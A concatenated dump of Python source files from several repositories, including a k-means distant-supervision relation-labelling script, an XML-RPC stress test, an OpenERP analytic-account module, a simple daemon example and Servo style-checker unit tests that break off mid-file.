is_framework = STRICT_FRAMEWORK_RE.match(filename)
if not is_framework:
return None
return is_framework.groupdict()
def test_framework_info():
def d(location=None, name=None, shortname=None, version=None, suffix=None):
return dict(
location=location,
name=name,
shortname=shortname,
version=version,
suffix=suffix
)
assert framework_info('completely/invalid') is None
assert framework_info('completely/invalid/_debug') is None
assert framework_info('P/F.framework') is None
assert framework_info('P/F.framework/_debug') is None
assert framework_info('P/F.framework/F') == d('P', 'F.framework/F', 'F')
assert framework_info('P/F.framework/F_debug') == d('P', 'F.framework/F_debug', 'F', suffix='debug')
assert framework_info('P/F.framework/Versions') is None
assert framework_info('P/F.framework/Versions/A') is None
assert framework_info('P/F.framework/Versions/A/F') == d('P', 'F.framework/Versions/A/F', 'F', 'A')
assert framework_info('P/F.framework/Versions/A/F_debug') == d('P', 'F.framework/Versions/A/F_debug', 'F', 'A', 'debug')
if __name__ == '__main__':
test_framework_info()
|
windworship/kmeansds
|
refs/heads/master
|
clustered_ds.py
|
1
|
# -*- coding: utf-8 -*-
#
# Author: huang
#
'''
Implementation of a framework that combines k-means clustering with distant supervision
'''
import argparse
import logging
import time
import random
import collections
from sklearn.cluster import MiniBatchKMeans, Birch
from sklearn.feature_extraction import FeatureHasher
from sklearn.metrics.pairwise import euclidean_distances
NEG_RATIO = 0.05 # the ratio of subsample negatives
SUBSAMPLE = True # Subsample the cluster or not
class MentionDatum(object):
'''
The Class of Mention in the Datum
'''
ENTITY = {} # First entity of the entity pair
TYPE = {} # Type of first entity
NE = {} # Type of second entity
SLOT = {} # Second entity of the entity pair
RELATION = {} # Belonged Relation in DS
FEATURE = {}
FEATURE_APPEARENCE = []
# Class variable of the counts of values
entity_number = 0
type_number = 0
ne_number = 0
slot_number = 0
relation_number = 0
feature_number = 0
# Initialization for @property
_entity_id = None
_entity_type = None
_ne_type = None
_slot_value = None
_relation = []
_features = []
def __init__(self, args):
self.entity_id = args[0]
self.entity_type = args[1]
self.ne_type = args[2]
self.slot_value = args[3]
self.relation = args[4]
self.features = args[5:]
self.relabel_relation = []
@property
def entity_id(self):
return self._entity_id
@property
def entity_type(self):
return self._entity_type
@property
def ne_type(self):
return self._ne_type
@property
def slot_value(self):
return self._slot_value
@property
def relation(self):
return self._relation
@property
def features(self):
return self._features
@entity_id.setter
def entity_id(self, value):
if value not in MentionDatum.ENTITY:
MentionDatum.ENTITY[value] = self.entity_number
MentionDatum.entity_number += 1
self._entity_id = MentionDatum.ENTITY.get(value)
@entity_type.setter
def entity_type(self, value):
if value not in MentionDatum.TYPE:
MentionDatum.TYPE[value] = self.type_number
MentionDatum.type_number += 1
self._entity_type = MentionDatum.TYPE.get(value)
@ne_type.setter
def ne_type(self, value):
if value not in MentionDatum.NE:
MentionDatum.NE[value] = self.ne_number
MentionDatum.ne_number += 1
self._ne_type = MentionDatum.NE.get(value)
@slot_value.setter
def slot_value(self, value):
if value not in MentionDatum.SLOT:
MentionDatum.SLOT[value] = self.slot_number
MentionDatum.slot_number += 1
self._slot_value = MentionDatum.SLOT.get(value)
@relation.setter
def relation(self, value):
value = value.split('|')
reform_relation = []
for rel in value:
if rel not in MentionDatum.RELATION:
MentionDatum.RELATION[rel] = self.relation_number
MentionDatum.relation_number += 1
reform_relation.append(MentionDatum.RELATION.get(rel))
self._relation = reform_relation
@features.setter
def features(self, value):
reform_feature = []
for feature in value:
if feature not in MentionDatum.FEATURE:
MentionDatum.FEATURE[feature] = self.feature_number
MentionDatum.feature_number += 1
MentionDatum.FEATURE_APPEARENCE.append(0)
feature_index = MentionDatum.FEATURE.get(feature)
MentionDatum.FEATURE_APPEARENCE[feature_index] += 1
reform_feature.append(feature_index)
self._features = reform_feature
def __str__(self):
relation = self.relation if not self.relabel_relation else self.relabel_relation
mention_str =\
(
'{0} {1} {2} {3} {4} {5}'
).format(
MentionDatum.ENTITY.get(self.entity_id),
MentionDatum.TYPE.get(self.entity_type),
MentionDatum.NE.get(self.ne_type),
MentionDatum.SLOT.get(self.slot_value),
'|'.join([MentionDatum.RELATION.get(rel) for rel in relation]),
' '.join([MentionDatum.FEATURE.get(fea) for fea in self.features]),
)
return mention_str
@classmethod
def shrink_features(cls, threshold=5):
'''
        Drop features whose appearance count is below the given threshold.
'''
shrinked_index = 0
shrinked_feature = {}
cls.FEATURE_INDEX = {} # Regenerate index for shrinked feature space
for fea, index in cls.FEATURE.iteritems():
if cls.FEATURE_APPEARENCE[index] >= threshold:
shrinked_feature[fea] = index
cls.FEATURE_INDEX[index] = shrinked_index
shrinked_index += 1
shrinked_feature_number = cls.feature_number - shrinked_index
cls.feature_number = shrinked_index
cls.FEATURE_APPEARENCE = None
logging.info('[OK]...Feature Shrinking')
logging.info('---# of shrinked Features: {0}'.format(shrinked_feature_number))
def _feature_vector_generation(self):
'''
Generate the feature vector in the shrinked feature space.
'''
return dict(
[
(str(MentionDatum.FEATURE_INDEX[index]), 1)
for index in self.features
if index in MentionDatum.FEATURE_INDEX
]
)
@classmethod
def regenerate_feature(cls, mentions):
'''
Generate feature vectors for all relation mentions
'''
return [mention._feature_vector_generation() for mention in mentions]
@classmethod
def transpose_values(cls):
'''
Transpose all value dicts for the generation of datum files.
'''
cls.ENTITY = dict(
zip(cls.ENTITY.values(), cls.ENTITY.keys())
)
cls.TYPE = dict(zip(cls.TYPE.values(), cls.TYPE.keys()))
cls.NE = dict(zip(cls.NE.values(), cls.NE.keys()))
cls.SLOT = dict(zip(cls.SLOT.values(), cls.SLOT.keys()))
cls.RELATION = dict(
zip(cls.RELATION.values(), cls.RELATION.keys())
)
cls.FEATURE = dict(
zip(cls.FEATURE.values(), cls.FEATURE.keys())
)
def _subsample_negatives(mention):
'''
Subsample negatives from mention.
:type mention: MentionDatum
:rtype boolean
'''
nr = MentionDatum.RELATION.get('_NR', None)
if nr is not None\
and [nr] == mention.relation\
and random.uniform(0, 1) > NEG_RATIO:
return False
return True
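# Example: with NEG_RATIO = 0.05, a mention labeled only '_NR' (a pure
# negative) is kept with probability ~0.05; all other mentions are kept.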
def _read_datum_file(file_path):
'''
Load the datum from the datum file
:type file_path: basestring
:type neg_ratio: double in [0,1]
:rtype List[MentionDatum]
'''
mentions = []
with open(file_path) as f:
for line in f:
mention = MentionDatum(line.split())
if not _subsample_negatives(mention):
continue
mentions.append(mention)
logging.debug(
'---[OK]...Datum File {0} Loaded | {1} Mentions Loaded'.format(
file_path,
len(mentions),
)
)
return mentions
def datums_read(directory, number=88):
'''
Load datums from NUMBER of datum files in the DIRECTORY
:type directory: basestring
:type number: int in [0, # of datum file in the DIRECTORY]
:rtype List[MentionDatum]
'''
def _generate_file_path(index, generate_mode='{0}/kb_part-00{1:0>2d}.datums'):
'''
Generate the file path in the directory
'''
return generate_mode.format(directory, index)
start = time.clock()
loaded_mentions = []
for datum_number in xrange(number):
loaded_mentions += _read_datum_file(_generate_file_path(datum_number+1))
time_cost = time.clock() - start
logging.info(
(
'[OK]...All Datums Loaded\n'
'---Cost Time: {0} | Average Per File: {1}\n'
'---# of Loaded Mentions: {2}\n'
'---# of Loaded Entities: {3}\n'
'---# of Loaded Entity Types: {4}\n'
'---# of Loaded NE Types: {5}\n'
'---# of Loaded Slots: {6}\n'
'---# of Loaded Relations: {7}\n'
'---# of Loaded Features: {8}\n'
).format(
time_cost,
time_cost/number,
len(loaded_mentions),
MentionDatum.entity_number,
MentionDatum.type_number,
MentionDatum.ne_number,
MentionDatum.slot_number,
MentionDatum.relation_number,
MentionDatum.feature_number,
)
)
return loaded_mentions
def _generate_feature_space(mentions):
'''
Generate the features space.
---------------------------------
:type mentions: List[MentionDatum]
:rtype: numpy.ndarray
'''
start = time.clock()
# Shrink the features
MentionDatum.shrink_features(threshold=5)
# Regenerate feature vectors
feature_space = MentionDatum.regenerate_feature(mentions)
# Generate feature space
feature_space =\
FeatureHasher(
n_features=MentionDatum.feature_number
).transform(feature_space)
time_cost = time.clock() - start
logging.info('[OK]...Generate Feature Space in {0}s'.format(time_cost))
return feature_space
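# Note: FeatureHasher hashes the (stringified) feature indices into
# n_features buckets, so distinct features can collide; sizing n_features
# to the shrunk vocabulary keeps such collisions rare.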
def _minibatchkmeans(feature_space, cluster_number):
'''
Use MinibatchKkmeans to divide the feature_space into cluster_number bags.
-------------------------------------------------------------------------
:type feature_space: numpy.ndarray
:type cluster_number: int
:rtype: numpy.ndarray[n_mentions,] labels of the mentions
'''
start = time.clock()
model =\
MiniBatchKMeans(
n_clusters=cluster_number,
n_init=22,
batch_size=5700
)
predicts = model.fit_predict(feature_space)
logging.info('[OK]...Kmeans Clustering | Cost {0}s'.format(time.clock()-start))
return predicts
def _predict_to_cluster(predicts, mentions):
'''
Transform predicts to clusters.
-------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type mentions: List[MentionDatum]
:rtype: List[[int,]]
'''
    # Size by the largest label: len(set(predicts)) under-allocates when
    # some kmeans clusters receive no mentions (non-contiguous labels).
    cluster_number = max(predicts) + 1
    clusters = [[] for _ in xrange(cluster_number)]
for index, predict in enumerate(predicts):
        clusters[predict] += mentions[index].relation
logging.info('------[OK]...Labels Transform To Clusters')
return clusters
def _assign_cluster_relation(predicts, mentions):
'''
Assign each cluster the most similar relation according to the assumption.
--------------------------------------------------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type mentions: List[MentionDatum]
:rtype: List[(int, double)]
'''
start = time.clock()
relation_for_clusters = []
# Predicts -> clusters
clusters = _predict_to_cluster(predicts, mentions)
    for cluster in clusters:
        if not cluster:
            # A kmeans cluster that received no mentions gets a null
            # assignment; it is never dereferenced per-mention downstream.
            relation_for_clusters.append((None, 0.0))
            continue
        relation_counter = collections.Counter(cluster)
        logging.info('---Cluster assign: {0}'.format(relation_counter))
        assign_relation = relation_counter.most_common(1)[0]
relation_for_clusters.append(
(
assign_relation[0],
(assign_relation[1]+0.0)/len(cluster),
)
)
time_cost = time.clock() - start
logging.info('---[OK]...Assign cluster relations cost of {0}'.format(time_cost))
return relation_for_clusters
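# Example: a cluster whose mentions carry relations [r1, r1, r2] is assigned
# (r1, 2/3) -- the majority relation and its share of the cluster's labels.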
def _subsample_mention(predicts, clusters, mentions):
'''
Subsample mentions in a cluster based on the probability of the relation.
-------------------------------------------------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type clusters: List[(int, double)]
:type mentions: List[MentionDatum]
:rtype: None
'''
start = time.clock()
subsample_number = 0
for index, predict in enumerate(predicts):
relation, probability = clusters[predict]
if not SUBSAMPLE or random.random() < probability:
mentions[index].relabel_relation.append(relation)
subsample_number += 1
time_cost = time.clock() - start
logging.info('---[OK]...Subsample mentions cost of {0}'.format(time_cost))
logging.info('------# of subsamples: {0}'.format(subsample_number))
def kmeans_predict(mentions, cluster_number=100):
'''
The framework predicts labels of mentions as following:
1. Generate the feature space
2. Kmeans divides the feature space into k clusters
3. Reassign each cluster a relation based on DS
4. Subsample mentions in the cluster to be labeled with corresponding relation
NOTE: Usually k is much higher than the # of known relations.
---------------------------------------------------
:type mentions:List[DatumMention]
:type cluster_number:int
:rtype None
'''
start = time.clock()
feature_space = _generate_feature_space(mentions)
predicts = _minibatchkmeans(feature_space, cluster_number)
relation_for_clusters = _assign_cluster_relation(predicts, mentions)
_generate_cluster(predicts, relation_for_clusters, mentions)
_subsample_mention(predicts, relation_for_clusters, mentions)
logging.info('[OK]...Framework | Cost {0}s'.format(time.clock()-start))
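# Minimal end-to-end sketch (hypothetical paths; mirrors the __main__ block):
#   mentions = datums_read('data/kb', number=10)
#   kmeans_predict(mentions, cluster_number=100)
#   regenerate_datums(mentions, 'output')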
def regenerate_datums(mentions, filepath):
'''
Regenerate datums with the new relation
-------------------------------------------------
:type mentions: List[MentionDatum]
:type filepath: basestring
:rtype: None
'''
start = time.clock()
file_number = len(mentions) / 90000 + 1
negative_number = 0
nr = MentionDatum.RELATION.get('_NR')
#transpose values
MentionDatum.transpose_values()
for index in xrange(file_number):
with open(filepath + '/{0:0>2d}.datums'.format(index), 'w') as f:
for mention in mentions[index*90000:(index+1)*90000]:
if nr in mention.relabel_relation:
negative_number += 1
f.write(str(mention))
f.write('\n')
logging.debug('---[OK]...Generate {0:0>2d}.datums'.format(index))
spend = time.clock() - start
logging.info('[OK]...Generate {0} Datums File'.format(file_number))
logging.info('[OK]...Negative number: {0}'.format(negative_number))
logging.info('---Cost time: {0} | Average per file: {1}'.format(spend, spend/file_number))
def _generate_cluster(predicts, clusters, mentions):
'''
Generate clusters from predicts.
    ---------------------------------------
:type predicts: numpy.ndarray[n_samples,]
:type clusters: List[(int, double)]
:type mentions: List[MentionDatum]
:rtype: None
'''
entity_index = dict(
zip(MentionDatum.ENTITY.values(), MentionDatum.ENTITY.keys())
)
slot_index = dict(
zip(MentionDatum.SLOT.values(), MentionDatum.SLOT.keys())
)
relation_index = dict(
zip(MentionDatum.RELATION.values(), MentionDatum.RELATION.keys())
)
    cluster_results = [[] for index in xrange(len(clusters))]
for index, predict in enumerate(predicts):
relation, probability = clusters[predict]
cluster_results[predict].append(
(
entity_index[mentions[index].entity_id],
slot_index[mentions[index].slot_value],
relation_index[mentions[index].relation[0]],
relation_index[relation],
)
)
for index, cluster_result in enumerate(cluster_results):
with open('result/'+str(index), 'w') as f:
f.write('\n'.join([str(result) for result in cluster_result]))
with open('result/index', 'w') as f:
f.write('\n'.join([str(index) for index in sorted(enumerate(clusters), key=lambda x:x[1][1])]))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('METHOD START')
parser = argparse.ArgumentParser()
parser.add_argument('-n', type=int)
parser.add_argument('-r', type=float)
parser.add_argument('-o', type=str)
parser.add_argument('-d', type=str)
parser.add_argument('-s', type=bool)
parser.add_argument('-f', type=int)
args = parser.parse_args()
start = time.clock()
cluster_number = args.n
NEG_RATIO = (args.r + 0.0) / 100
SUBSAMPLE = True if args.s else False
logging.info('CLUSTER NUMBER:{0}'.format(cluster_number))
logging.info('NEG_RATIO:{0}'.format(NEG_RATIO))
logging.info('OUTPUT_DIR:{0}'.format(args.o))
logging.info('DATA_DIR:{0}'.format(args.d))
logging.info('SUBSAMPLE:{0}'.format(SUBSAMPLE))
mentions = datums_read(args.d, number=args.f)
kmeans_predict(mentions, cluster_number)
regenerate_datums(
mentions,
args.o,
)
logging.info('Method End With {0}s'.format(time.clock()-start))
|
maxtaco/okws
|
refs/heads/master
|
test/system/xmlxlate/py/stress.py
|
5
|
import xmlrpclib
import sys
class RpcConst:
def __init__ (self):
pass
def set (self, lst):
setattr (self, lst[0], lst[1])
def setall (self, lst):
for p in lst:
self.set (p)
if len (sys.argv) == 2:
host = sys.argv[1]
else:
host = "0.0.0.0:8081"
server_url = "http://" + host + "/xlater"
server = xmlrpclib.Server (server_url)
#server.system.setDebugLevel (4)
C = RpcConst ()
C.setall (server.xdr.constants ( [ "tstprot"] ) )
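# Arguments are encoded as "<xdr-type>:<value>" strings -- apparently XDR
# type tags: ui4 (unsigned 32-bit), i8 (signed 64-bit), ui8 (unsigned
# 64-bit) -- which is what the round-trip checks below exercise.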
for i in range(0,10000):
ull = 2**61 * 7 + 44
ll = 0 - (2**62 + 33)
res = server.xdr.xlate (
{ "hostname" : "127.0.0.1",
"port" : 4000,
"program" : "tst_prog_1",
"procno" : C.TST_RPC4,
"arg" : { "x" : "ui4:" + str (8484848),
"y" : "i8:" + str (ll),
"z" : "ui8:"+ str (ull)
}
} )
ull_post = long(res['z'][4:])
ll_post = long (res['y'][3:])
if ull != ull_post:
raise ValueError, "RPC problem translating u_int64_t; " + \
"got %x, expected %x" % (ull_post, ull)
if ll != ll_post:
raise ValueError, "RPC problem translating int64_t; " + \
"got %d, expected %d" % (ll_post, ll)
|
eezee-it/server-tools
|
refs/heads/8.0
|
base_user_gravatar/models/__init__.py
|
44
|
# -*- coding: utf-8 -*-
# © 2015 Endika Iglesias
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import res_users
|
credativUK/OCB
|
refs/heads/7.0-local
|
addons/account_analytic_default/account_analytic_default.py
|
43
|
# -*- coding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class account_analytic_default(osv.osv):
_name = "account.analytic.default"
_description = "Analytic Distribution"
_rec_name = "analytic_id"
_order = "sequence"
_columns = {
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of analytic distribution"),
'analytic_id': fields.many2one('account.analytic.account', 'Analytic Account'),
'product_id': fields.many2one('product.product', 'Product', ondelete='cascade', help="Select a product which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this product, it will automatically take this as an analytic account)"),
'partner_id': fields.many2one('res.partner', 'Partner', ondelete='cascade', help="Select a partner which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this partner, it will automatically take this as an analytic account)"),
'user_id': fields.many2one('res.users', 'User', ondelete='cascade', help="Select a user which will use analytic account specified in analytic default."),
'company_id': fields.many2one('res.company', 'Company', ondelete='cascade', help="Select a company which will use analytic account specified in analytic default (e.g. create new customer invoice or Sales order if we select this company, it will automatically take this as an analytic account)"),
'date_start': fields.date('Start Date', help="Default start date for this Analytic Account."),
'date_stop': fields.date('End Date', help="Default end date for this Analytic Account."),
}
def account_get(self, cr, uid, product_id=None, partner_id=None, user_id=None, date=None, context=None):
domain = []
        if product_id:
            domain += ['|', ('product_id', '=', product_id)]
            domain += [('product_id', '=', False)]
        if partner_id:
            domain += ['|', ('partner_id', '=', partner_id)]
            domain += [('partner_id', '=', False)]
        if user_id:
            domain += ['|', ('user_id', '=', user_id)]
            domain += [('user_id', '=', False)]
if date:
domain += ['|', ('date_start', '<=', date), ('date_start', '=', False)]
domain += ['|', ('date_stop', '>=', date), ('date_stop', '=', False)]
best_index = -1
res = False
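        # Score each matching record by how many criteria it sets;
        # the most specific record (highest score) wins.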
for rec in self.browse(cr, uid, self.search(cr, uid, domain, context=context), context=context):
index = 0
if rec.product_id: index += 1
if rec.partner_id: index += 1
if rec.user_id: index += 1
if rec.date_start: index += 1
if rec.date_stop: index += 1
if index > best_index:
res = rec
best_index = index
return res
account_analytic_default()
class account_invoice_line(osv.osv):
_inherit = "account.invoice.line"
_description = "Invoice Line"
def product_id_change(self, cr, uid, ids, product, uom_id, qty=0, name='', type='out_invoice', partner_id=False, fposition_id=False, price_unit=False, currency_id=False, context=None, company_id=None):
res_prod = super(account_invoice_line, self).product_id_change(cr, uid, ids, product, uom_id, qty, name, type, partner_id, fposition_id, price_unit, currency_id=currency_id, context=context, company_id=company_id)
rec = self.pool.get('account.analytic.default').account_get(cr, uid, product, partner_id, uid, time.strftime('%Y-%m-%d'), context=context)
if rec:
res_prod['value'].update({'account_analytic_id': rec.analytic_id.id})
else:
res_prod['value'].update({'account_analytic_id': False})
return res_prod
account_invoice_line()
class stock_picking(osv.osv):
_inherit = "stock.picking"
def _get_account_analytic_invoice(self, cursor, user, picking, move_line):
partner_id = picking.partner_id and picking.partner_id.id or False
        rec = self.pool.get('account.analytic.default').account_get(cursor, user, move_line.product_id.id, partner_id, user, time.strftime('%Y-%m-%d'), context={})
if rec:
return rec.analytic_id.id
return super(stock_picking, self)._get_account_analytic_invoice(cursor, user, picking, move_line)
stock_picking()
class sale_order_line(osv.osv):
_inherit = "sale.order.line"
# Method overridden to set the analytic account by default on criterion match
def invoice_line_create(self, cr, uid, ids, context=None):
create_ids = super(sale_order_line, self).invoice_line_create(cr, uid, ids, context=context)
if not ids:
return create_ids
sale_line = self.browse(cr, uid, ids[0], context=context)
inv_line_obj = self.pool.get('account.invoice.line')
anal_def_obj = self.pool.get('account.analytic.default')
for line in inv_line_obj.browse(cr, uid, create_ids, context=context):
rec = anal_def_obj.account_get(cr, uid, line.product_id.id, sale_line.order_id.partner_id.id, sale_line.order_id.user_id.id, time.strftime('%Y-%m-%d'), context=context)
if rec:
inv_line_obj.write(cr, uid, [line.id], {'account_analytic_id': rec.analytic_id.id}, context=context)
return create_ids
sale_order_line()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
AJellyBean/CloudPan
|
refs/heads/master
|
python/wallpaper_plugin/test.py
|
1
|
# coding=utf8
# python 2.7
import time, platform
import os
import sys
import re
import fcntl
# import pidfile
def funzioneDemo():
    # Example worker function standing in for the daemon's real business logic
fout = open('/tmp/demone.log', 'w')
while True:
fout.write(time.ctime() + '\n')
fout.flush()
time.sleep(2)
fout.close()
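# Classic double-fork daemonization: the first fork lets the parent exit,
# setsid() detaches the child from its controlling terminal, and the second
# fork ensures the daemon (no longer a session leader) cannot reacquire one.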
def createDaemon():
    # First fork: let the parent exit so the child runs in the background
try:
if os.fork() > 0: os._exit(0)
except OSError, error:
print 'fork #1 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
os.chdir('/')
os.setsid()
os.umask(0)
try:
pid = os.fork()
if pid > 0:
print 'Daemon PID %d' % pid
os._exit(0)
except OSError, error:
print 'fork #2 failed: %d (%s)' % (error.errno, error.strerror)
os._exit(1)
    # Redirect standard I/O to /dev/null
sys.stdout.flush()
sys.stderr.flush()
si = file("/dev/null", 'r')
so = file("/dev/null", 'a+')
se = file("/dev/null", 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
    # Run the payload in the daemonized child process
funzioneDemo() # function demo
# Entry point: only daemonize on Linux
if __name__ == '__main__':
if platform.system() == "Linux":
createDaemon()
else:
os._exit(0)
|
nox/servo
|
refs/heads/master
|
python/tidy/servo_tidy_tests/test_tidy.py
|
4
|
# Copyright 2013 The Servo Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
import os
import unittest
from servo_tidy import tidy
base_path = 'servo_tidy_tests/' if os.path.exists('servo_tidy_tests/') else 'python/tidy/servo_tidy_tests/'
def iterFile(name):
return iter([os.path.join(base_path, name)])
class CheckTidiness(unittest.TestCase):
def assertNoMoreErrors(self, errors):
with self.assertRaises(StopIteration):
errors.next()
def test_tidy_config(self):
errors = tidy.check_config_file(os.path.join(base_path, 'servo-tidy.toml'), print_text=False)
self.assertEqual("invalid config key 'key-outside'", errors.next()[2])
self.assertEqual("invalid config key 'wrong-key'", errors.next()[2])
self.assertEqual('invalid config table [wrong]', errors.next()[2])
self.assertEqual("ignored file './fake/file.html' doesn't exist", errors.next()[2])
self.assertEqual("ignored directory './fake/dir' doesn't exist", errors.next()[2])
self.assertNoMoreErrors(errors)
def test_directory_checks(self):
dirs = {
os.path.join(base_path, "dir_check/webidl_plus"): ['webidl', 'test'],
os.path.join(base_path, "dir_check/only_webidl"): ['webidl']
}
errors = tidy.check_directory_files(dirs)
error_dir = os.path.join(base_path, "dir_check/webidl_plus")
self.assertEqual("Unexpected extension found for test.rs. We only expect files with webidl, test extensions in {0}".format(error_dir), errors.next()[2])
self.assertEqual("Unexpected extension found for test2.rs. We only expect files with webidl, test extensions in {0}".format(error_dir), errors.next()[2])
self.assertNoMoreErrors(errors)
    def test_spaces_correctness(self):
errors = tidy.collect_errors_for_files(iterFile('wrong_space.rs'), [], [tidy.check_by_line], print_text=False)
self.assertEqual('trailing whitespace', errors.next()[2])
self.assertEqual('no newline at EOF', errors.next()[2])
self.assertEqual('tab on line', errors.next()[2])
self.assertEqual('CR on line', errors.next()[2])
self.assertEqual('no newline at EOF', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_empty_file(self):
errors = tidy.collect_errors_for_files(iterFile('empty_file.rs'), [], [tidy.check_by_line], print_text=False)
self.assertEqual('file is empty', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_long_line(self):
errors = tidy.collect_errors_for_files(iterFile('long_line.rs'), [], [tidy.check_by_line], print_text=False)
self.assertEqual('Line is longer than 120 characters', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_whatwg_link(self):
errors = tidy.collect_errors_for_files(iterFile('whatwg_link.rs'), [], [tidy.check_by_line], print_text=False)
self.assertTrue('link to WHATWG may break in the future, use this format instead:' in errors.next()[2])
self.assertTrue('links to WHATWG single-page url, change to multi page:' in errors.next()[2])
self.assertNoMoreErrors(errors)
def test_license(self):
errors = tidy.collect_errors_for_files(iterFile('incorrect_license.rs'), [], [tidy.check_license], print_text=False)
self.assertEqual('incorrect license', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_shebang_license(self):
errors = tidy.collect_errors_for_files(iterFile('shebang_license.py'), [], [tidy.check_license], print_text=False)
self.assertEqual('missing blank line after shebang', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_shell(self):
errors = tidy.collect_errors_for_files(iterFile('shell_tidy.sh'), [], [tidy.check_shell], print_text=False)
self.assertEqual('script does not have shebang "#!/usr/bin/env bash"', errors.next()[2])
self.assertEqual('script is missing options "set -o errexit", "set -o pipefail"', errors.next()[2])
self.assertEqual('script should not use backticks for command substitution', errors.next()[2])
self.assertEqual('variable substitutions should use the full \"${VAR}\" form', errors.next()[2])
self.assertEqual('script should use `[[` instead of `[` for conditional testing', errors.next()[2])
self.assertEqual('script should use `[[` instead of `[` for conditional testing', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_apache2_incomplete(self):
errors = tidy.collect_errors_for_files(iterFile('apache2_license.rs'), [], [tidy.check_license])
self.assertEqual('incorrect license', errors.next()[2])
def test_rust(self):
errors = tidy.collect_errors_for_files(iterFile('rust_tidy.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('extra space after {', errors.next()[2])
self.assertEqual('extra space before }', errors.next()[2])
self.assertEqual('use statement spans multiple lines', errors.next()[2])
self.assertEqual('missing space before }', errors.next()[2])
self.assertTrue('use statement is not in alphabetical order' in errors.next()[2])
self.assertEqual('use statement contains braces for single import', errors.next()[2])
self.assertTrue('use statement is not in alphabetical order' in errors.next()[2])
self.assertEqual('encountered whitespace following a use statement', errors.next()[2])
self.assertTrue('mod declaration is not in alphabetical order' in errors.next()[2])
self.assertEqual('mod declaration spans multiple lines', errors.next()[2])
self.assertTrue('extern crate declaration is not in alphabetical order' in errors.next()[2])
self.assertEqual('found an empty line following a {', errors.next()[2])
self.assertEqual('missing space before ->', errors.next()[2])
self.assertEqual('missing space after ->', errors.next()[2])
self.assertEqual('missing space after :', errors.next()[2])
self.assertEqual('missing space before {', errors.next()[2])
self.assertEqual('missing space before =', errors.next()[2])
self.assertEqual('missing space after =', errors.next()[2])
self.assertEqual('missing space before -', errors.next()[2])
self.assertEqual('missing space before *', errors.next()[2])
self.assertEqual('missing space after =>', errors.next()[2])
self.assertEqual('missing space after :', errors.next()[2])
self.assertEqual('missing space after :', errors.next()[2])
self.assertEqual('extra space before :', errors.next()[2])
self.assertEqual('extra space before :', errors.next()[2])
self.assertEqual('use &[T] instead of &Vec<T>', errors.next()[2])
self.assertEqual('use &str instead of &String', errors.next()[2])
self.assertEqual('use &T instead of &Root<T>', errors.next()[2])
self.assertEqual('encountered function signature with -> ()', errors.next()[2])
self.assertEqual('operators should go at the end of the first line', errors.next()[2])
self.assertEqual('else braces should be on the same line', errors.next()[2])
self.assertEqual('extra space after (', errors.next()[2])
self.assertEqual('extra space after (', errors.next()[2])
self.assertEqual('extra space after (', errors.next()[2])
self.assertEqual('extra space after test_fun', errors.next()[2])
self.assertEqual('no = in the beginning of line', errors.next()[2])
self.assertEqual('space before { is not a multiple of 4', errors.next()[2])
self.assertEqual('space before } is not a multiple of 4', errors.next()[2])
self.assertNoMoreErrors(errors)
feature_errors = tidy.collect_errors_for_files(iterFile('lib.rs'), [], [tidy.check_rust], print_text=False)
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertTrue('feature attribute is not in alphabetical order' in feature_errors.next()[2])
self.assertNoMoreErrors(feature_errors)
ban_errors = tidy.collect_errors_for_files(iterFile('ban.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('Banned type Cell<JSVal> detected. Use MutJS<JSVal> instead', ban_errors.next()[2])
self.assertNoMoreErrors(ban_errors)
ban_errors = tidy.collect_errors_for_files(iterFile('ban-domrefcell.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('Banned type DOMRefCell<JS<T>> detected. Use MutJS<JS<T>> instead', ban_errors.next()[2])
self.assertNoMoreErrors(ban_errors)
def test_spec_link(self):
tidy.SPEC_BASE_PATH = base_path
errors = tidy.collect_errors_for_files(iterFile('speclink.rs'), [], [tidy.check_spec], print_text=False)
self.assertEqual('method declared in webidl is missing a comment with a specification link', errors.next()[2])
self.assertEqual('method declared in webidl is missing a comment with a specification link', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_script_thread(self):
errors = tidy.collect_errors_for_files(iterFile('script_thread.rs'), [], [tidy.check_rust], print_text=False)
self.assertEqual('use a separate variable for the match expression', errors.next()[2])
self.assertEqual('use a separate variable for the match expression', errors.next()[2])
self.assertNoMoreErrors(errors)
def test_webidl(self):
